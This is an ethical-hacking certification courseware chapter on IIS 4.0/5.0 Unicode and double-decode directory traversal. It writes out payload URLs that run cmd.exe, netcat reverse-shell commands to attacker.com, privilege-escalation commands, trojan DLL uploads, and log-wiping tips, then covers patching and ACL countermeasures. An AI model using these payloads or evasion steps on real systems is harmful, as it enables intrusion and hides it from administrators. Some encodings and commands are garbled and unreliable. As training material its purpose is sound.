Exploit | Staf of EC-Council - Ethical Hacking Student Courseware. Certidied Ethical Hacker-Exam 312-50 (EC-Council E-Business Certification Series)

One of the principal security functions of a web server is to restrict user requests so they can only access files within the web folders. Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended Unicode character representations are used in substitution for "/" and "\". This vulnerability provides a way for a malicious user to provide a special URL to the web site that will access any files whose name and location he knows , and which is located on the same logical drive as the web folders. This would potentially enable a malicious user who visited the web site to gain additional privileges on the machine - specifically , it could be used to gain privileges commensurate with those of a locally logged-on user. Gaining these permissions would enable the malicious user to add, change or delete data, run code already on the server, or upload new code to the server and run it. For instance, consider the following valid url.

http://target/scripts/..%c1%1c../ path /file.ext

Eg.

http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir

http://target/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

Another exploit demonstrates how an attacker can execute commands using a redirect on the target host.

To begin, the attacker copies ".. \..\winnt\system32\cmd.exe" to "..\..\interpub\scripts\cmd1.exe"
He appends the command to the valid URL.

http://site/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+copy+..\..\winnt\system32\cmd.exe+cmd1.exe

Vulnerable IIS returns: "CGI Error ... 1 file(s) copied ."

The specified CGI application does not return a complete set of HTTP headers. Instead it returns the above error.
Next the attacker runs "cmd1.exe /c echo abc >aaa & dir & type aaa" along with the URL to list the directory contents.

aaa&dir&type+aaa">http://site/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+abc+>aaa&dir&type+aaa

Vulnerable IIS returns:
```
 " Directory of c: \inetpub\scripts 10/25/2000 03:48p <DIR> . 10/25/2000 03:48p <DIR> .. 10/25/2000 03:51p 6 aaa 12/07/1999 05:00a 236,304 cmd1.exe .. abc " 
```

Unicode

ASCII characters for the dots are replaced with hexadecimal equivalent (%2E).
ASCII characters for the slashes are replaced with Unicode equivalent (%co%af).
Unicode 2.0 allows multiple encoding possibilities for each characters.
Unicode for"/": 2f, c0af, e080af, f08080af, f8808080af,.....
Overlong Unicode are NOT malformed , but not allowed by a correct Unicode encoder and decoder.
Maliciously used to bypass filters that only check short Unicode.

Unicode extensions are installed by default with Microsoft Internet Information Server (IIS) version 4.0 and 5.0. This is to allow characters that are not used in the English language to be recognized by web servers. Computers store letters and other characters by assigning a number to them.

Unicode provides a unique number for every character. Unicode forms a single character set across all languages. It is a standard 2-byte or 3-byte character set. The IIS Unicode Exploit allows users to run arbitrary commands on the web server. IIS servers with the Unicode extensions loaded are vulnerable unless they are running current patches.

This exploit can be used when:

A writeable or executable directory is available; allowing attackers to upload malicious code.
A system executable such as cmd.exe is available on the root and does not have an access control list applied to it.

The attack occurs when an attacker sends a malformed URL to a web server that looks something like this:

http://victim/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+ c:

If the target has a virtual executable directory (e.g. scripts) located on the same directory of Windows system, the directory of C: will be revealed. The question mark inserted after cmd.exe represents a command line argument.

For instance, appending a/c as in the above example, indicates that it carries out the command specified by the sub ceding string and then terminates. The "+" indicates the space between arguments. The variable /..%255c..%255c decodes to /.... which translates to a directory traversal.

This is equivalent to sending a hex value to the server. A common example is %20 which refers to a space. Using a direct hex interpretation of a directory traversal will be checked by IIS user access denied .

Still, the exploit occurs because the CGI routine within the web server decodes the address twice. First CGI filename will be decoded to check if it is an executable file (e.g. '.exe' or '.com') After the filename checkup , IIS will run another decode process. So an attacker will send various hex values of a required character till a suitable value is accepted.

Therefore '..' can be represented by '..%255c' , '..%%35c' etc. After first decoding, '..%255c' is turned into '..%5c' IIS will take it as legal character string that can pass security checkup. However, after a second decode process, it will be reverted to '..' and the attack succeeds.

http://www.somesite.com/../../../../../winnt/repair/sam .

In this case, the web server will just look for the file in the web root directory called "../../../../../winnt/repair/sam._". The '../' tells the web server to search one directory above, so here, the web server will look in the document root for a file called winnt/repair/sam. _. The no. of '../"s does not matter as long as there are enough of them to traverse back to the root of the file system (either c: or / on UNIX system)

The IIS Unicode exploit uses the HTTP protocol and malformed URLs to traverse directories and execute arbitrary commands on the vulnerable web servers. The IIS Unicode exploit uses a Unicode representation of a directory delimiter (/) to fool IIS. Because the exploit uses http, it works directly from the address bar of a browser. Because of the non-interactive nature of this exploit, interactive commands such as ftp & telnet do not work.

IIS Logs

IIS logs all the visits in log files. The log file is located at <%systemroot%>\logfiles
Be careful. If you don't use proxy, then your IP will be logged.
This command lists the log files:

 http://victim.com/scripts/..%c0%af../.. %c 0%af../..%c0%af../..%c0%af../..%c0%af../. .%c0%af../..%c0%af../..%c0%af../winnt/sys tem32/cmd.exe?/c+dir+C:\Winnt\system32\Lo gfiles\W3SVC1

Note

Capturing and maintaining log files are critical to the secure administration of a web server. While it is generally considered that the log does not capture an intrusion till after the request has been processed , a diligent administrator might couple logging with tools such as urlscan which will make logging more effective. Here, we will discuss some of the best practices that can be followed when it comes to IIS logs. The best way to emphasize the value and importance of IIS log files would be to draw a comparison to a crime scene, such that while handling IIS logs, they must be treated as if they are evidence already. Coupling IIS logs with other monitoring records such as Firewall logs, IDS logs, and even TCPDump can lend more credibility in the event of the log being used for evidence.

The first rule is to configure the IIS logs to record every available field. Gathering information about Web visitors can help establish the source of an attack - either by linking it to a system or to a user. The more information that is collected, the better chance there is of pinning down the perpetrator.

The second rule is to capture events with a proper time stamp. This is because IIS records logs using UTC time. The accuracy of the UTC time can be ensured only if the local time zone setting is correct.

The third rule is to ensure continuity in the logs. IIS logs do not register a log entry if the server does not get any hits in a 24- hour period. This makes the presence of an empty log file ambiguous as there is no way of telling if the server received no hits, was offline or if the log file was actually deleted. The simplest workaround would be to use the Task Scheduler and schedule hits. In general, scheduled requests can indicate that the logging mechanism is functioning properly. Therefore, if a log file is missing, it is probably because the file was intentionally deleted.

The fourth rule is to ensure that logs are not modified in any way after they have been originally recorded. Once a log file is created, it is important to prevent the file from being accessed and audit any authorized and unauthorized access. One way to achieve this is to move the IIS logs off the Web server. File signatures are helpful because if a single file is corrupted, it does not invalidate the rest of the logs. Also, when doing any log file analysis, the original files must be never worked with. After the log is closed, no one should have permissions to modify the file contents.

Hacking Tool: IISxploit.exe

This tool automates directory traversal exploit in IIS

Perhaps the vulnerability that has had the most telling effect after buffer overflow is the file system traversal vulnerability. The two file system traversal exploits that has hogged the limelight are the Unicode and the double decode (sometimes termed superfluous decode ) attacks.

The Unicode vulnerability was first seen in the Packetstorm forums in early 2001 and formally developed by Rain Forest Puppy (RFP). In his exposition of the problem, he notes that "%c0%af and %c1%9c are overlong Unicode representations for '/' and '\'. IIS seems to decode Unicode at the wrong instance (after path checking, rather than before).

Threat

If an attacker gives an HTTP request such as the one that follows , arbitrary commands can be executed on the server:

GET /scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+'c: \'HTTP /1.0

Several other "illegal" representations of "/" and " \" are feasible as well, including %c1%1c, %c1%9c, %c1%1c, %c0%9v, %c0%af, %c0%qf, %c1%8s, %c1%9c, and %c1%pc.

Tools

IISxploit by greek pirate allows the user to exploit the directory traversal vulnerability in IIS. The GUI allows the user to key in the target name and also specify a spoofed IP. The user can then choose to read, download, and delete files on the target machine.

Hacking Tool: execiis-win32.exe

This tool exploits IIS directory traversal and takes command from cmd and executes them on the IIS Server

NSFOCUS Security Team reported vulnerability in filename processing of CGI program in MS IIS4.0/5.0. The CGI filename was decoded twice erroneously. By exploiting this vulnerability, it was possible for an intruder to run arbitrary system commands. The exploit is possible because while loading executable CGI program. First, CGI filename will be decoded to check if it is an executable file (for example, '.exe' or '.com' suffix check-up). On successfully passing the filename check-up, IIS will run another decode process. Normally, only CGI parameters should be decoded in this process. However, this time IIS mistakenly decodes both CGI parameters and the decoded CGI filename. In this way, CGI filename is decoded twice by error.

Threat

With a malformed CGI filename, an attacker can get round IIS filename security check-ups like '../' or'./' check-up. In some cases, attacker can also run arbitrary system command.

For example, a character '\' will be encoded to "%5c". And the corresponding code of these 3 characters is: '%' = %25, '5' = %35 and 'c' = %63. Encoding these 3 characters again can result in %255c, %%35c, %%35%63, %25%35%63 etc. This makes it possible to represent '..\' by '..%255c' and '..%%35c',etc.

After first decoding, '..%255c' is turned into '..%5c'. IIS will take it as a legal character string that can pass security check-up. However, after a second decode process, it will be reverted to '.. \'. Hence, attacker can use '..\'to do directory traversal and run arbitrary program outside of Web directory.

Tools

Execiis-win32.exe exploits IIS directory traversal, takes command from cmd.exe, and executes them on the IIS Server.

Hacking Tool: Unicodeuploader.pl

Unicode upload creator (unicodeloader.pl) works as follows:

Two files (upload.asp and upload.inc - have them in the same dir as the PERL script) are built in the webroot (or any where else) using echo and some conversion strings. These files allow you to upload any file by simply surfing with a browser to the server.
1. Find the webroot
2. perl unicodeloader target: 80 'webroot'
3. surf to target/upload.asp and upload nc.exe
4. perl unicodexecute3.pl target: 80 'webroot/nc -l -p 80 -e cmd.exe'
5. telnet target 80
Above procedure will drop you into the shell on the box.

Tools

Unicodeuploader.pl is a perl script written by Roelof Temmingh to exploit the Unicode vulnerability in windows. There are three components involved in the exploit. Two files (upload. asp and upload.inc - hosted in the same dir as the PERL script) are built in the webroot using echo and some conversion strings. These files allow the attacker to upload any file by simply surfing with a browser to the server.

Typical use: (5 easy steps to a shell)

Find the webroot - example: d:\webpage\root
perl unicodeloader target:8o 'd: \webpage\root'
Surf to target/upload. asp and upload nc.exe
Perl unicodexecute3.pl target: 8o'd: \webpage\root\nc -1 -p 80 -e cmd.exe'
Telnet target 80

Threat

The above procedure will invoke a shell on the target without crashing the server. The attacker can then proceed to upload other malicious code right after nc.exe. This procedure works well for servers that are tightly firewalled (- as it uses the allowed port 80); servers that are not allowed to FTP, RCP or TFTP to the Internet.

Hacking Tool: cmdasp.asp

After uploading nc.exe to the web server, you can shovel a shell back to your pc.
Shoveling a shell back to the attacker's system is easy:
1. Start a netcat listener on the attacker's system:
```
 c:\>nc.exe -1 -p 2002 
```
2. Use cmdasp.asp to shovel a netcat shell back to the listener:
```
 c:\inetpub\scripts\nc.exe -v -e cmd.exe attacker.com 2002 
```

The attacker can also choose to extend this exploit by shoveling a shell back to his system. Shoveling a shell back to the attacker's system is easy:

Start a netcat listener on the attacker's system: c: \>nc.exe -l -p 2002
Use cmdasp.asp to shovel a netcat shell back to the listener: c:\inetpub\scripts\nc.exe -v -e cmd.exe attacker.com 2002

Tools

CmdAsp.asp - is an interactive ASP page command prompt. It works on IIS web servers that are vulnerable to the use of the IUSR_COMPUTER and IWAM_COMPUTER user accounts. These accounts will execute scripts such as ASP or Perl. It is important to note that these accounts belong to the everyone group .

In IIS 5, any process started by a wscript.shell object will run in the context of the IWAM_* account, and can be a point of attack as demonstrated by cmdasp.asp. It runs in the context of the web server as a standard ASP page and makes a good back door to any IIS web server.

The script assumes that IUSR_COMPUTER can write to the root directory "c: \". This is true for default NT/2000 installs . However, it is not a requirement that this script can write to the file system to execute commands. It is only a requirement for viewing the piped output of the commands.

Echo OPEN 10.0.2.0 > c:\ftp.txt & vol

Echo USER anonymous hacked@yourcompany.com >> c:\ftp.txt & vol

Echo GET myfile >> c: \ftp.txt & vol

Echo BYE >> c:\ftp.txt & vol

Cd c:\ & ftp -n -s:c:\ftp.txt

Del c:\ftp.txt

Escalating Privileges on IIS

On IIS 4, the LPC ports can be exploited using hk.exe
hk.exe will run commands using SYSTEM account on windows pertaining to intruders to simply add the IUSR or IWAM account to the local administrator's group.
```
 hk.exe net localgroup administrators IUSR_machinename /add 
```
Note: LPC port vulnerability is patched on IIS 5.0

Applications within Windows are entirely controlled through the use of messages. However, on Win32 the mechanism for controlling these messages is flawed. Any application on a given desktop can send a message to any window on the same desktop, regardless of whether or not that window is owned by the sending application, and regardless of whether the target application wants to receive those messages.

Tools

Hk.exe is a program that exploits a vulnerability in the Win32 API (LPC<local procedure call) that can be used to get system level access net commands (net view, net share, net use, etc)

As hk.exe is a local privilege escalation exploit that runs processes as SYSTEM. Attackers can then just run netcat via hk.exe, connect to the listener, execute processes with SYSTEM privileges.

For instance, the following command will shovel a shell to the attacker's port. Note that hk only works on NT4.

Hk nc -d -e cmd.exe attacker:port

Hacking Tool: iiscrack.dll

iiscrack.dll works like upload.asp and cmd.asp.
iiscrack.dll provides a form- based input for attackers to enter commands to be run with SYSTEM privileges.
An attacker could rename iiscrack.dll to idq.dll, upload the trojan DLL to c:\inetpub\scripts using upload.asp and execute it via the web browser using:

http://victim.com/scripts/idq.dll
The attacker now has the option to run virtually any command as SYSTEM

Privilege elevation vulnerability arises because of a flaw in a table that IIS 5.0 consults when determining whether a process should be in process or out-of-process. IIS supports three different modes of process isolation. These modes control how well the IIS process is isolated from the processes that are being invoked as part of the request processing.

IIS 5.0 contains a table that lists the system files that should always run in-process. The vulnerability results because the list that specifies the names does so using relative paths as well as absolute paths. This use of relative paths means that if an executable having the same name as one on the list were uploaded to any folder on the server and executed, it would run in process. Once this occurred, the executable could, by definition, gain system privileges.

Due to a weakness in IIS, several dll files were always executed by the least secure isolation level regardless of the actual process isolation settings. By adding or replacing one of these dlls with a malicious version, an attacker could run arbitrary code with SYSTEM privileges. On a misconfigured server, if an attacker is able to load a program of his choice and execute it, the code would be able to gain system privileges. This would give the attacker complete control of the server. He could do anything he wished, from modifying web pages, to reconfiguring the server, to reformatting the hard drive.

Tools

One way of doing this would be to use iiscrack.dll, which works like upload. asp and cmd.asp. iiscrack.dll provides a form-based input for attackers to enter commands to be run with SYSTEM privileges. An attacker could rename iiscrack.dll to idq.dll, upload the trojan DLL to c:\inetpub\scripts using upload. asp and execute it with the web browser using: http://victim.com/scripts/idq.dll . The attacker now has the option to run virtually any command as SYSTEM.

Hacking Tool: ispc.exe

ISPC.exe is a Win32 client that is used to connect a trojan ISAPI DLL (idq.dll).
Once the trojan DLL is cpied to the victim webserver (/sripts/idq.dll), the attacker can execute ispc.exe and immediately obtain a remote shell running as SYSTEM.
```
 c:\>ispc.exe victim.com/scripts/idq.dll 80 
```

This exploit tool is similar too in that it requires inserting a rogue .dll file into a web directory, recommends the use of either the Unicode or Double Decode exploits in order to accomplish this, and produces a SYSTEM-level access. It is different in that it has two components: a client file, ispc.exe, for connecting from the attacker's machine, and idq.dll (or one of the other in-process .dll files in the above list/table), a server-side ISAPI program for privilege escalation execution. It is also different in that it is executed from a command prompt at the attacker's machine, rather than from a browser.

This software makes use of the IIS 5.0 + SP0, SP1, SP2 privilege checking hole to obtain SYSTEM privilege; all that is needed is to upload idq.dll to an executable directory of IIS, to obtain SYSTEM privilege.

Usage:

First use the UNICODE or double decoding hole to upload idq.dll to an executable directory, for example /scripts, and then use ispc.exe to connect:

 C:\>ispc 127.0.0.1/scripts/idq.dll    C: \WINNT\system32>

The cmd.exe thus obtained has SYSTEM privileges.

After you've uploaded idq.dll to an IIS executable directory, it must be called one of the following: idq.dll, httpext .dll, httpodbc.dll, ssinc.dll, msw3prt.dll, author.dll, Admin.dll, shtml.dll, sspifilt.dll, compfilt.dll, pwsdata.dll, md5filt.dll, fpexedll.dll

If another name is used, then there's no way to obtain SYSTEM privilege.
After you've finished entering a command, you must hit carriage return three times, to get a prompt back.
SP3 is not affected by this hole.

Unspecified Executable Path Vulnerability

When executables and DLL files are not preceded by a path in the registry (eg. explorer.exe does not have a fixed path by default).
Windows NT 4.0 / 2000 will search for the file in the following locations in this order:
- the directory from which the application loaded.
- the current directory of the parent process,
- ...\system32
- ...\system
- the windows directory
- the directories specified in the PATH environment variable

The registry entry that specifies the Windows Shell executable (Explorer.exe) provides a relative, rather than absolute, path name. When executables and DLL files are not preceded by a path in the registry (eg. explorer.exe does not have a fixed path by default), Windows NT 4.0 / 2000 will search for the file in the following locations in this order: the directory from which the application loaded. The current directory of the parent process ... \System32, ...\\System, the Windows directory, the directories specified in the PATH environment variable

The Windows Shell is the familiar desktop that's used for interacting with Windows. During system startup, Windows NT 4.0 and Windows 2000 consult the "Shell" registry entry, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\She 11, to determine the name of the executable that should be loaded as the Shell. By default, this value specifies Explorer.exe.

This may open up the possibility of automatic execution of Trojans if they are renamed as executables that do not have a path specified. If we use the example of explorer.exe, a Trojan named as such could be written to the root directory. At system startup time, the normal search order would cause any file named Explorer.exe in the %Systemdrive% \ directory to be loaded in place of the bona fide version. This could provide an opportunity for a malicious user to cause code of his choice to run when another user subsequently logged onto the same machine. Remote exploitation is feasible if the root directory is accessible through a share or if a malicious user were to implant the Trojan onto the root directory through other means.

Hacking Tool: CleanIISLog

This tool clears the log entries in the IIS log files filtered by IP address.
An attacker can easily cover his trace by removing entries based on his IP address in W3SVC Log Files.

This tool clears the log entries in the IIS log files filtered by IP address. An attacker can easily cover his trace by removing entries based on his IP address in the Log Files.

File System Traversal Counter measures

Microsoft recommends setting the NTFS ACLS on cmd.exe and several other powerful executables to Administration and SYSTEM: Full Control only.
Remove executable permission to IUSR account.
This should stop directory traversal in IIS.
Apply Microsoft patches and Hotfixes regularly.

File System Traversal Countermeasures as recommended by Microsoft Corporation: Recommends setting the NTFS ACLS on cmd.exe and several other powerful executables to Administration and SYSTEM: Full Control only. It is advised that the executable permission to IUSR account be removed. This should stop directory traversal in IIS. It is also necessary that the Microsoft patches and hot fixes regularly be applied on a regular basis.

Solution: UpdateExpert

Update Expert is a Windows administration program that helps you secure your systems by remotely managing service packs and hot fixes.
Microsoft constantly releases updates for the OS and mission critical applications, which fix security vulnerabilities and system stability problems.
UpdateExpert enhances security, keeps systems up to date, eliminates sneaker-net, improves system reliability and QoS

Update EXPERT is a hotfix and service pack security management utility that helps systems administrators keep their hotfixes and service packs up-to-date by analyzing which service packs and hotfixes are installed on the Windows 2000/NT and Terminal Server machines on their network, which ones are not installed and which ones are available. UpdateEXPERT facilitates locating, downloading and installing the latest service packs and hotfixes. UpdateExpert eliminates the confusion and labor of maintaining hotfixes.

cacls.exe utility

Built-in Windows 2000 utility (cacls.exe) can set access control list (ACLs) permissions globally.
Let's say you want to change permissions on all executable files to System:Full, Administrators:Full,
```
 C:\>cacls.exe c:\myfolder\*.exe /T /G System:F Administrators:F 
```

Cacls.exe is a Windows NT/2000/XP command-line tool that can be used to assign, display, or modify ACLs (access control lists) to files or folders. Cacls is an interactive tool, and since it's a command-line utility, it can also be used in batch files. Cacls can also be used in conjunction with other command-line tools. Used with other administration tools, Cacls will make it much easier to handle administrative tasks performed in large environments.

The usage of Cacls is from the command line for single tasks or within a batch file for multiple operations. The default location of Cacls.exe is in the %SystemRoot% \System32 folder for all installations of Windows NT, 2000, and XP and requires the NTFS file system. Cacls also allows for the use of wildcards, variables , and multiple permissions or users per line. Cacls usage is similar across all Windows versions, which eases the learning curve across new releases of Windows. To see the Cacls options, start a command prompt, and type cacls. This will show a list of options and parameters. The simplest operation that Cacls can perform is to display the ACLs of a file or folder with a command such as: cacls c: \folder\file.txt

Operation	Parameter
Change ACLs of specified files in current folder and all subfolders	/T
Edit ACL instead of replacing it	/E
Continue on access-denied errors	/C
Grant specified user access rights;	/G user: perm
Permissions are Read (R), Write (W), Change (C), Full Control (F) Revoke ACLs	/R user
Replace specified user's access rights;	/P user: perm
Permissions are None (N) and same options from grant operation Deny specified user access	/D user

Network Tool: Whisker

Whisker is an automated vulnerability scanning software which scans for the presence of exploitable files on remote Web servers.

Refer the output of this simple scan given below and you will see Whisker has identified several potentially dangerous files on this IIS5Server

 c:\>whisker.pl -h victim.com -s scan.db           = - = - = - = - = - = - =     = Host: victim.com           = Server: Microsoft-IIS/5.0           + 200 OK: GET / whisker.ida           + 200 OK: GET / whisker.idg           + 200 OK: HEAD /_vti_inf.html           + 200 OK: HEAD / _vti_bin/shtml.dll           + 200 OK: HEAD / _vti_bin/shtml.exe

Tools

The primary purpose of whisker 2.0 is to be a CGI scanner, which is used to search for known vulnerable CGIs on websites . Whisker does this by both scanning the CGIs directly as well as crawling the website in order to determine what CGIs are already currently in use.

Whisker is an excellent CGI scanner. Whisker has the capability to not only check for CGI vulnerabilities but do so in an evasive manner, so as to elude intrusion detection systems. It comes with excellent documentation which should be carefully reviewed prior to running the program. When you have found your Web servers serving up CGI scripts, Whisker can be an excellent resource for checking the security of these servers.

Whisker popularized Web vulnerability scanning with its Perl implementation, which made extending the URL database easy. Whisker is best used as a URL scanner. It identifies Web pages with known security problems or those pages that should be removed to make a clean Web document root. It can also perform brute force attacks against sites using HTTP Basic Authentication.

The last version of Whisker also has the capability to scan servers over SSL, but the scanner suffers the drawback of being primarily a URL checker. If it doesn't find a page, it reports it to the user, but vulnerability checks for IIS bugs such as the Unicode or Double Decode directory traversal or Netscape's PageServices bug are not in this version.

Network Tool: Stealth HTTP Scanner

http://wwwnstalker.com/nstealth/

N-Stealth 5 is an impressive Web vulnerability scanner that scans over 18000 HTTP security issues.
Stealth HTTP Scanner writes scan results to an easy HTML report.
N-Stealth is often used by security companies for penetration testing and system auditing, specifically for testing Web servers.

Tools

N-Stealth 5.0 is a vulnerability-assessment product that scans web servers to identify security problems and weaknesses that might allow an attacker to gain privileged access. The software comes with an extensive database of over 25,000 vulnerabilities and exploits. N-Stealth is more actively maintained than the network security scanners and consequently has a larger database of vulnerabilities.

N-Stealth is a comprehensive web server security-auditing tool that scans for over 25,000 vulnerabilities. It is ideal for system administrators, security consultant and IT professionals. The software has a wide array of scanning techniques and extensive security-hole database. The program runs on Windows 95/98/ME/NT/2K or XP.